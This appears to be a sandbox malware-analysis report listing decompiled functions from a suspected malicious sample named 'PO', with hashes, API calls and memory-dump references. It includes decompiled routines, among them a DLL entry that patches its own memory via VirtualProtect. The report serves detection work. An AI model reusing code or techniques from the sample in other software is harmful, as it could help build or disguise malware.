Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: dac0b8971ba2920abb5474f128329a0fa477ab7403896bbfc0984bb8014ca22f
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 4AE08632100119ABCF105F50DC00EEB376CEB00350F004832FA65E2040E230EA219BE4

Uniqueness

Uniqueness Score: -1.00%

Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22
registryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00402CC9(void* __eflags, void* _a4) {
				short* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t8 = E00402BBF(0x22);
				_t9 =  *0x40cdd8; // 0x3c8fc4c
				_t3 = _t9 + 4; // 0x1106
				_t11 = RegOpenKeyExW(E00402CB4( *_t3), _t8, 0,  *0x42a2f0 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}

0x00402cdd
0x00402ce3
0x00402ce8
0x00402cf1
0x00402cf9
0x00402d01

APIs

RegOpenKeyExW.KERNELBASE(00000000,00001106,00000000,00000022,00000000,?,?), ref: 00402CF1

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
Instruction ID: ef45ff86538a2d51f1b0222ec8c1b297abd10be8bd22699319dc95f068cee933
Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
Instruction Fuzzy Hash: CCE08676244108BFDB00DFA8DE47FD537ECAB14700F004031BA08D70D1C674E5508768

Uniqueness

Uniqueness Score: -1.00%

Function 00405DD6 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DD6(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405dda
0x00405dea
0x00405df2
0x00000000
0x00405df9
0x00000000
0x00405dfb

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040336B,0040A230,0040A230,0040326F,00414ED0,00004000,?,00000000,00403119), ref: 00405DEA

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction ID: f39de87387fc754cac4ceee649b5e38243fe2bf9183d254406dbd5143e25ae03
Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction Fuzzy Hash: 57E0EC3221125AABDF509F65DC08AEB7B6DEF05360F008837F955E6160D631E9219BE8

Uniqueness

Uniqueness Score: -1.00%

Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}

0x100027d0
0x100027d5
0x100027e5
0x100027ed
0x100027f4
0x100027f9
0x100027fe
0x10002803
0x10002808
0x1000280d
0x10002812
0x10002812
0x1000281a

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5

Memory Dump Source

Source File: 00000001.00000002.85191842667.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.85191813710.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191874016.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191898523.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_PO.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040159B() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402BBF(0xfffffff0),  *(_t11 - 0x28)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015a6
0x004015ac
0x004015ae
0x0040281e
0x0040281e
0x00402a4f
0x00402a5b

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ba3b4c390174c241c579d37fedc31f062acef12686ac8f882cea17aec191ca18
Instruction ID: b466977811d287c246b6c4bdd3c4099c205cff96c1e3616f4719a22f3098d0f0
Opcode Fuzzy Hash: ba3b4c390174c241c579d37fedc31f062acef12686ac8f882cea17aec191ca18
Instruction Fuzzy Hash: 4ED05B33704100D7CB10DFE89E0869D7775AB40334B208177D501F21E4D6B9C5515B1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040428E Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040428E(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x429218;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x0040428e
0x00404295
0x004042a0
0x00000000
0x004042a0
0x004042a6

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
Instruction ID: 8584b4a80e8197aea4c9dd325401cbfcfbe68695eba590e205f4256e4e85e437
Opcode Fuzzy Hash: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
Instruction Fuzzy Hash: 67C04C71740600BBDA20CB649D45F1677546754740F1448697640A60E0C674D420D62C

Uniqueness

Uniqueness Score: -1.00%

Function 0040336E Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040336E(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040337c
0x00403382

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404277 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404277(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a248, 0x28, _a4, 1); // executed
				return _t2;
			}

0x00404285
0x0040428b

APIs

SendMessageW.USER32(00000028,?,00000001,004040A3), ref: 00404285

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00404264 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404264(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x423724, _a4); // executed
				return _t2;
			}

0x0040426e
0x00404274

APIs

KiUserCallbackDispatcher.NTDLL(?,0040403C), ref: 0040426E

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
Instruction ID: ea629541fdd2228df96855dc4de4e407fdbb002a66502a1a5a86269346c048a7
Opcode Fuzzy Hash: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
Instruction Fuzzy Hash: C0A001B6644500ABCE129F90EF49D0ABBB2EBE8742B518579A285900348A364961EB59

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7() {
				long _t2;
				void* _t6;
				void* _t10;

				_t2 = E00402BA2(_t6);
				if(_t2 <= 1) {
					_t2 = 1;
				}
				Sleep(_t2); // executed
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t10 - 4));
				return 0;
			}

0x004014d8
0x004014e0
0x004014e4
0x004014e4
0x004014e6
0x00402a4f
0x00402a5b

APIs

Sleep.KERNELBASE(00000000), ref: 004014E6

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f9d451d74586546bbd407ca2e24b621689a583ca5f98dcf473e6f9f09c96531a
Instruction ID: 98ea867d558ea3f6c4ea23e9af3ccb97d5497e9459daf2a95be3f4ba7839a378
Opcode Fuzzy Hash: f9d451d74586546bbd407ca2e24b621689a583ca5f98dcf473e6f9f09c96531a
Instruction Fuzzy Hash: E7D01277B14100DBD760EFB9BF89C6F73A9EB513293214837D902E11A2D57DC812462D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404C59 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00404C59(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x42a268;
				_t282 = 0;
				_v24 =  *0x42a250 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42a259 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404BA7(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42a258) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42370c;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x423720;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42370c = _t282;
								 *0x423720 = _t282;
								 *0x42a2a0 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42a259 & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404C27();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x423720;
									_t195 =  *0x42a268;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42a26c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x42921c + 0x10)) != _t282) {
											E00404B62(0x3ff, 0xfffffffb, E00404B7A(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x42a26c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x423720);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42a2a0 = _t306;
					 *0x423720 = GlobalAlloc(0x40,  *0x42a26c << 2);
					_t252 = LoadBitmapW( *0x42a240, 0x6e);
					 *0x423714 =  *0x423714 | 0xffffffff;
					_t313 = _t252;
					 *0x42371c = SetWindowLongW(_v8, 0xfffffffc, E00405251);
